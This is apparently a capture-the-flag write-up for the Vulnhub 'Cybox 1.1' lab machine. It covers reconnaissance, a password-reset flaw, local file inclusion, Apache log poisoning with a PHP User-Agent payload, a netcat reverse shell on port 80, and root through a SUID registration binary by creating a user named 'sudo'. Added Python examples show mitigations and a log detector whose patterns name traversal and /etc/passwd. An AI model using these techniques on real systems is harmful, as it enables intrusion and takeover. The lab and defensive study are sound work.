Vulnhub - Cybox 1.1 write up

Will you be able to compromise the internal server of the CYBOX company?

Difficulty: Medium
Objective: Get user.txt and root.txt

This works better with VirtualBox rather than VMware.
Contact: @takito1812


Let's scan our network to find the IP of the box.

$ sudo netdiscover

 Currently scanning:   |   Screen View: Unique Hosts
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 264
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
                 08:00:27:e2:7c:c9      1      60  PCS Systemtechnik GmbH

Port scan:

$ nmap -p -1024 -T4 -oN scan.nmap

21/tcp  open  ftp
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https

There are many open ports: FTP, mail (SMTP, POP3 and IMAP) and web (HTTP and HTTPS).


I try to do an anonymous login on the FTP but it doesn't work.


Nothing interesting on this static webpage apart from the admin email, which gives us a valid username and the domain (

The HTTPS certificate confirms the validity of the admin email address.

/C=US/ST=New York/L=New York City/O=Cybox Company/OU=Cybox/

gobuster was running in the background to find some new endpoints.

$ /opt/gobuster dir -w /opt/directory-list-lowercase-2.3-medium.txt -x php,txt,html -t 30 --url -q -o gobuster.dir

/index.html           (Status: 200) [Size: 8514]
/assets               (Status: 301) [Size: 237] [-->]
/phpmyadmin           (Status: 403) [Size: 92]

/phpmyadmin returns:

For security reasons, this URL is only accesible using localhost ( as the hostname

I try to change my Host HTTP header but it does not work.

$ curl -H "Host: localhost"
For security reasons, this URL is only accesible using localhost ( as the hostname

$ curl -H "Host:"
For security reasons, this URL is only accesible using localhost ( as the hostname

So I try to brute-force the virtual hosts; maybe we can find some new web applications.

$ /opt/gobuster vhost -w /opt/directory-list-lowercase-2.3-medium.txt -t 30 --url -q -o vhost.dir

Found: (Status: 200) [Size: 1252]
Found: (Status: 200) [Size: 209]      
Found: (Status: 302) [Size: 0]    
Found: (Status: 302) [Size: 0]    
Found: (Status: 200) [Size: 5295] 

Add them to the /etc/hosts file.

$ cat /etc/hosts

Yes, there are many apps! Let's create a user on the register app.

user: toto

Now we can log in to the webmail and the monitor app. We have no mail and the monitor has no content. Let's try to reset our password.

Let's check our emails.

OK, now what if we change the reset link?


Yes! We can reset the admin password on the monitor app! We now have access to a new admin panel.
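The write-up does not show what was changed in the reset link, but the outcome (a reset requested for our own account lets us set the admin password) means the link was not tied to the account it was generated for. The Python below is an added example, not code from the box or from the write-up, of the property the app evidently lacked: a reset token that is random, stored only as a hash, bound to one account, time-limited and single-use. The in-memory store and the 15-minute lifetime are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# Pending resets keyed by the SHA-256 of the token, so a database dump does
# not hand out usable links. Kept in memory here (assumption for the example).
_PENDING: Dict[str, Tuple[str, float]] = {}
TOKEN_TTL = 15 * 60  # seconds a link stays valid (assumed policy)


def _digest(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(username: str, now: Optional[float] = None) -> str:
    """Create a random token for `username` and return the value to embed in
    the e-mailed link. The owning account is recorded server-side, never
    taken from the link itself."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _PENDING[_digest(token)] = (username, now + TOKEN_TTL)
    return token


def consume_reset_token(token: str, claimed_user: str,
                        now: Optional[float] = None) -> Optional[str]:
    """Validate a reset attempt. Returns the account the token was issued
    for when the token is known, unexpired and matches the account named in
    the submitted link; otherwise None. A successful use burns the token."""
    now = time.time() if now is None else now
    key = _digest(token)
    record = _PENDING.get(key)
    if record is None:
        return None
    owner, expiry = record
    if now > expiry:
        del _PENDING[key]
        return None
    # Constant-time compare: the account in the link must be the token's
    # owner, so editing the link to name another user cannot redirect the reset.
    if not hmac.compare_digest(owner.encode(), claimed_user.encode()):
        return None
    del _PENDING[key]
    return owner


if __name__ == "__main__":
    link_token = issue_reset_token("toto")
    print("swapped user:", consume_reset_token(link_token, "admin"))  # None
    print("own account :", consume_reset_token(link_token, "toto"))   # toto
    print("replayed    :", consume_reset_token(link_token, "toto"))   # None
```

A stricter variant would also burn the token on the first mismatched attempt; the version above only refuses it, which is enough to stop the account swap but leaves the legitimate link usable.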

After looking at the source code of the page, we find this:

<link href="styles.php?style=general" type="text/css" rel="stylesheet">

Maybe we can do an LFI (Local File Inclusion) through the style parameter. After some URL guessing we find a CSS file at /admin/styles/general.css.

After a few quick tries, we can confirm the LFI.
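The text names the symptom but not the code behind styles.php. The Python below is an added example, not the app's own PHP, that puts the bug class (the style value is concatenated onto the stylesheet directory with no check) beside a hardened loader that allowlists the name and verifies the normalised path still lies inside the directory. The stylesheet directory under the Bitnami docroot and the appended .css suffix are assumptions.

```python
import posixpath
import re

# Assumed location of the stylesheets served by styles.php: the /admin/styles/
# path found by URL guessing, under the Bitnami docroot seen in the shell prompt.
STYLE_DIR = "/opt/bitnami/apache2/htdocs/monitor/admin/styles"
# Allowlist for the style parameter: a short bare identifier, no dots or slashes.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_style_path(style: str) -> str:
    """The bug class behind styles.php?style=...: the parameter is glued onto
    the directory unchecked, so '../' sequences walk out of STYLE_DIR."""
    return posixpath.normpath(STYLE_DIR + "/" + style)


def hardened_style_path(style: str):
    """Return the file to include, or None if the name fails the allowlist or
    the normalised path does not stay inside STYLE_DIR. Assumes the loader
    appends the .css suffix itself rather than trusting the client to."""
    if not SAFE_NAME.fullmatch(style):
        return None
    candidate = posixpath.normpath(posixpath.join(STYLE_DIR, style + ".css"))
    # Independent second guard, in case the allowlist is ever loosened.
    if posixpath.commonpath([STYLE_DIR, candidate]) != STYLE_DIR:
        return None
    return candidate


def escapes_style_dir(path: str) -> bool:
    """True when an absolute path resolves outside STYLE_DIR."""
    return posixpath.commonpath([STYLE_DIR, posixpath.normpath(path)]) != STYLE_DIR


if __name__ == "__main__":
    for value in ("general", "../../../../../../etc/passwd"):
        vuln = vulnerable_style_path(value)
        print(f"{value!r:32} vulnerable -> {vuln} (escapes: {escapes_style_dir(vuln)})")
        print(f"{'':32} hardened   -> {hardened_style_path(value)}")
```

The allowlist alone already blocks traversal; the containment check is kept as a second, independent control so that a later change to the regex does not silently reopen the hole.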


So now let's try to load a log file. After some brute-forcing, we find the Apache access log of the app at /opt/bitnami/apache2/logs/access_log.
By making HTTP requests to the FTP app we control part of the content of the access_log file, so we can inject PHP code into it.

$ curl "" -A '<?php echo "toto"; ?>'
-A: sets the User-Agent header; the payload is single-quoted so the shell passes the inner double quotes through unchanged
Go to

... - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "toto"

The PHP code is executed! When I try to get a reverse shell, the Cybox machine can't reach our box on the usual ports; some firewall rules, I guess. So I make the reverse shell connect back on port 80 and it works!
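Seen from the defender's side, the log-poisoning step above leaves two traces in the very same access_log: a PHP open tag inside a client-controlled header, and a later request whose query string walks up the directory tree to the log file. The Python below is an added example, not part of the write-up, that parses Apache combined-format lines and flags both patterns. The sample lines are constructed (addresses from the 192.0.2.0/24 documentation range, a hypothetical curl version string); the write-up's own "toto" line is included to show that the post-execution entry is not itself flagged.

```python
import re
from typing import Dict, List, Optional, Tuple

# Apache "combined" log layout, the format of the access_log entry quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators: PHP open tags smuggled into client-controlled headers, directory
# traversal in the request line, and references to log files or PHP wrappers.
PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(?:\.\./|\.\.%2f|%2e%2e)", re.IGNORECASE)
LOG_OR_WRAPPER = re.compile(r"(?:access_log|error_log|/etc/passwd|php://|data:)",
                            re.IGNORECASE)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an entry is suspicious (empty list means clean)."""
    reasons = []
    for field in ("ua", "referer"):
        if PHP_TAG.search(entry[field]):
            reasons.append(f"php-tag-in-{field}")
    if TRAVERSAL.search(entry["path"]):
        reasons.append("path-traversal")
    if LOG_OR_WRAPPER.search(entry["path"]):
        reasons.append("log-or-wrapper-reference")
    return reasons


def scan(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (client ip, request path, reasons) for every flagged line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], reasons))
    return hits


# Constructed sample log (not taken from the box): the write-up's "toto" entry,
# a poisoned User-Agent, the LFI request reading the log back, a normal asset fetch.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "toto"',
    '192.0.2.10 - - [03/Jan/2021:21:56:10 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "<?php echo 1; ?>"',
    '192.0.2.10 - - [03/Jan/2021:21:57:02 +0100] "GET /admin/styles.php?style=../../../../opt/bitnami/apache2/logs/access_log HTTP/1.1" 200 812 "-" "curl/7.74.0"',
    '192.0.2.44 - - [03/Jan/2021:22:01:30 +0100] "GET /assets/logo.png HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(reasons)}")
```

Run over a real access_log this is a cheap first pass; the traversal and wrapper patterns are the ones worth alerting on regardless of whether the header poisoning was ever noticed.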

$ nc -lvnp 80
Connection from
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
python: /opt/bitnami/common/lib/ no version information available (required by python)
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)


We have our first shell! Let's find the user.txt flag!

daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd
bash: cd: HOME not set
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd /home
daemon@cybox:/home$ ls
admin  cybox  toto
daemon@cybox:/home$ cd cybox
daemon@cybox:/home/cybox$ ls 
daemon@cybox:/home/cybox$ cat user.txt


We can switch to the user toto:toto that we previously created on the register app (this is not required to root the box).

After some enumeration we find a weird SUID binary at /opt/registerlauncher. It's an ELF that creates the different users on the box from the register app (like our user toto). It takes one parameter: the name of the user to create.

I try to find some vulnerabilities associated with the ELF but find nothing.

So I ask myself: what user could we create to gain privileges? Remember that at the beginning I created a user toto whose password was also toto. So I try to run the binary with root as the parameter; maybe this will replace the root password with root. But I get "user already exists". RIP

After some research, my friend W00dy finds that if you create a user named sudo, we can execute all commands with sudo by providing the password sudo.

toto@cybox:/tmp$ /opt/registerlauncher sudo
sudo has been created successfully. The credentials are sudo:sudo. You should change your default password for security.
toto@cybox:/tmp$ su sudo
Password: sudo

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

sudo@cybox:/tmp$ sudo -l
[sudo] password for sudo: sudo

Matching Defaults entries for sudo on cybox:
    env_reset, mail_badpass,

User sudo may run the following commands on cybox:
    (ALL : ALL) ALL
sudo@cybox:/tmp$ sudo su
root@cybox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

We are root!

root@cybox:/tmp# cat /etc/sudoers    
# Allow members of group sudo to execute any command
root@cybox:/tmp# cat /root/root.txt

The user sudo was covered by the /etc/sudoers file (the entry that lets the sudo group run any command), which is why sudo -l showed (ALL : ALL) ALL for it.
Root flag!
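The root cause of the last step is a registration path that turns user-chosen names into system accounts, sets the password equal to the name, and never checks whether the name collides with an existing account, group or sudoers principal. The Python below is an added example, not the registerlauncher's code, of the validation such a registration app should run before it calls anything like useradd, plus a random initial secret instead of password == username. The /etc/passwd, /etc/group and /etc/sudoers excerpts are constructed for the example, not copied from the box.

```python
import re
import secrets
from typing import List, Set

# Constructed excerpts of the account databases (not copied from the box).
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
cybox:x:1000:1000::/home/cybox:/bin/bash
admin:x:1001:1001::/home/admin:/bin/bash
"""
GROUP = """root:x:0:
daemon:x:1:
adm:x:4:
sudo:x:27:cybox
"""
SUDOERS = """# Allow members of group sudo to execute any command
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
"""

# A registrable name: lowercase, starts with a letter, 3 to 32 characters.
NAME_RE = re.compile(r"^[a-z][a-z0-9_-]{2,31}$")


def first_fields(db: str) -> Set[str]:
    """Names from a colon-separated database such as /etc/passwd or /etc/group."""
    return {line.split(":", 1)[0]
            for line in db.splitlines() if line and not line.startswith("#")}


def sudoers_principals(text: str) -> Set[str]:
    """Users and groups granted rules in a sudoers file (group names without the %)."""
    names = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        names.add(line.split()[0].lstrip("%"))
    return names


def check_username(name: str, passwd: str = PASSWD, group: str = GROUP,
                   sudoers: str = SUDOERS) -> List[str]:
    """Return the reasons a requested name must be refused (empty means OK)."""
    problems = []
    if not NAME_RE.match(name):
        problems.append("invalid-format")
    if name in first_fields(passwd):
        problems.append("user-exists")
    if name in first_fields(group):
        problems.append("collides-with-group")
    if name in sudoers_principals(sudoers):
        problems.append("named-in-sudoers")
    return problems


def initial_password() -> str:
    """Random initial secret handed to the new user instead of password == username."""
    return secrets.token_urlsafe(12)


if __name__ == "__main__":
    for candidate in ("toto", "root", "sudo", "Admin!"):
        verdict = check_username(candidate) or ["ok"]
        print(f"{candidate:8} -> {', '.join(verdict)}")
```

On this box the group check alone would have refused the name sudo; the sudoers check catches the same problem even where a privileged name is granted directly rather than through a group.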
